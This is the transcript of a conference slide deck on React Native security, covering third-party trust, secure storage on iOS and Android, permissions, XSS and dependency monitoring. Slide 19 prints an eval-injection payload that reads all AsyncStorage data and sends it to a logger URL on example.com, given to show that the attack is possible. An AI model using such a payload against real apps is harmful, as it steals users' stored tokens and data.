$30 off During Our Annual Pro Sale. View Details »

React Native Security

Julia Mezher
December 05, 2020
Technology
0
260

React Native Security

Julia Mezher

December 05, 2020
Tweet

More Decks by Julia Mezher

See All by Julia Mezher
Crypto wallets security: for developers
julep
0
2.6k
React Native Security
julep
0
340
Why can't developers make it secure?
julep
0
1.8k
Encryption Export Regulations. Why should mobile developers care?
julep
0
150
The Art of Secure Architecture
julep
0
710
Common iOS Vulnerabilities and How to Fix Them
julep
1
1.8k
Secure Authentication. Are you sure you do it right?
julep
1
650
Making Authentication More Secure
julep
0
350
Touch ID and Face ID. Is It Secure?
julep
1
430

Other Decks in Technology

See All in Technology
Cloud Security Day 2023パネルディスカッション資料
coconala_engineer
0
160
Exploring Postgres VACUUM with the VACUUM Simulator
keiko713
5
700
機械学習システム構築実践ガイド
shibuiwilliam
0
290
LINE WORKS 最新メジャーアップデート(v3.8)勉強会
lwug
0
150
開発組織の体制づくり、いつやるか問題
akiroom
0
1.8k
Amazon Bedrock を利用したAIチャットボット開発
yukimatsuyoshi
1
480
CI/CDプロセスの拡充からはじめる技術的負債の解消/Eliminate technical debt, starting with expanding CI/CD processes
onecareer_tech
0
550
LangChainやるならPythonよりTypeScriptの方がいんじゃね?
optimisuke
0
230
Making your Kubernetes-based log collection reliable & durable with Vector
palark
0
370
AI・機械学習ライブラリを使ったWebアプリでワクワク体験! / Qiita Night~AI、機械学習 / 20231201
you
PRO
1
1.2k
お客様、そこは秘孔です!突かないでください! HTTP/2 Rapid reset の概要と対策
murachiakira
0
160
dbt Coreとdbt-athenaによるAWS上のdbt環境構築ナレッジ
nayuts
0
240

Featured

See All Featured
The Illustrated Children's Guide to Kubernetes
chrisshort
26
45k
Debugging Ruby Performance
tmm1
68
11k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
1
890
Typedesign – Prime Four
hannesfritz
35
1.8k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
10
1.3k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
5
740
Visualization
eitanlees
131
13k
Navigating Team Friction
lara
177
13k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
24
2k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
656
120k
What’s in a name? Adding method to the madness
productmarketing
PRO
14
2.3k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
226
16k

Transcript

  1. React Native Security
    Addressing Typical Mistakes
    JULIA POTAPENKO

    View Slide

  2. About me
    Security Software
    Engineer at Cossack Labs
    We help companies to protect their
    sensitive and valuable data.
    @julepka

    View Slide

  3. We will talk about
    Architecture
    Platforms usage
    Dependencies

    View Slide

  4. “Choosing React Native and its components
    means that you understand and accept
    potential security consequences.”

    View Slide

  5. Architecture basics
    React Native is a cross-platform solution from Facebook
    that allows writing native apps using React (JavaScript or
    TypeScript).

    View Slide

  6. Trusting third parties
    Apple and Google are must haves.
    Add Facebook to the list.

    View Slide

  7. Trusting third parties
    Apple and Google are must haves.
    Add Facebook to the list.

    View Slide

  8. Trusting third parties
    Apple and Google are must haves.
    Add Facebook to the list.
    CVE-2020-1911

    CVE-2020-1912

    CVE-2020-1913

    View Slide

  9. “Working with React Native developers
    deal with security for all three platforms:
    iOS, Android and React Native.”

    View Slide

  10. OWASP Mobile
    Top 10
    #1
    Improper platform
    usage

    View Slide

  11. React Native is a leaky abstraction
    @vixentael

    View Slide

  12. Secure Store Example
    iOS Android
    Keychain
    SharedPreferences +
    KeyStore
    Data stored encrypted Yes Yes

    View Slide

  13. Secure Store Example
    iOS Android
    Keychain
    SharedPreferences +
    KeyStore
    Data stored encrypted Yes Yes
    Data persists across
    app reinstalls
    Yes No
    Hardware-backed
    encryption
    Yes
    Depends on device
    vendor
    Data decrypted only
    before usage
    Decrypted when
    device unlocked
    Yes

    View Slide

  14. Managing Android Permissions
    Android: You can add permissions in multiple files

    View Slide

  15. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Navite: It is common practice to use third-party
    solutions

    View Slide

  16. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Navite: It is common practice to use third-party
    solutions
    =

    View Slide

  17. Managing Android Permissions
    Android: You can add permissions in multiple files
    +
    React Native: It is common practice to use third-party
    solutions
    =

    I don’t need this permission
    The app crashes if I delete it

    View Slide

  18. Is XSS possible?
    XSS possibility is decreases by design.

    View Slide

  19. Is XSS possible?
    XSS possibility is decreases by design.
    XSS is still possible.
    eval()
    _reactNative.AsyncStorage.getAllKeys(function(err,result)
    {_reactNative.AsyncStorage.multiGet(result,function(err,result)
    {fetch(‘http://example.com/logger.php?token='+JSON.stringify(result));});});
    Steal all the data from local storage (AsyncStorage) by exploiting
    eval-based injection and accessing React Native APIs

    View Slide

  20. Apart from Source Code
    Annual BIS Reports
    US encryption export regulations
    Apple privacy rules
    User acknowledgement about private data usage

    View Slide

  21. “50 shades of dependencies”

    View Slide

  22. A typical day for React Native app developer

    View Slide

  23. A typical day for React Native app developer
    (It is joke )

    View Slide

  24. Monitoring dependencies

    View Slide

  25. Monitoring dependencies

    So many dependencies
    Additional CI work
    Integrating dependency checkers

    View Slide

  26. Monitoring dependencies

    So many dependencies
    Additional CI work
    One update triggers another update
    Integrating dependency checkers
    Updates may be incompatible
    What if there is no fix for vulnerability?

    View Slide

  27. ✅ Learn more about the issue, its scope
    ✅ Document it, make the team aware
    ✅ Monitor it and book the time for the update
    What if there is no fix?

    View Slide

  28. ✅ Learn more about the issue, its scope
    ✅ Document it, make the team aware
    ✅ Monitor it and book the time for the update
    What if there is no fix?
    React Native requires team to plan time more carefully

    View Slide

  29. React Native requires team to plan time more carefully
    ➡ iOS or Android update
    ➡ React Native update
    ➡ Forked version update
    ➡ Dependencies update
    ➡ Mobile app source code update

    View Slide

  30. Final Thoughts
    “Learn once, write anywhere.”
    “Learn once, ask mobile security
    people for help.”

    View Slide

  31. Where to go next
    My React Native Security Article
    https://www.cossacklabs.com/blog/react-native-app-security.html
    React Native Security Guide
    https://reactnative.dev/docs/security

    View Slide

  32. Thank You!
    @julepka

    View Slide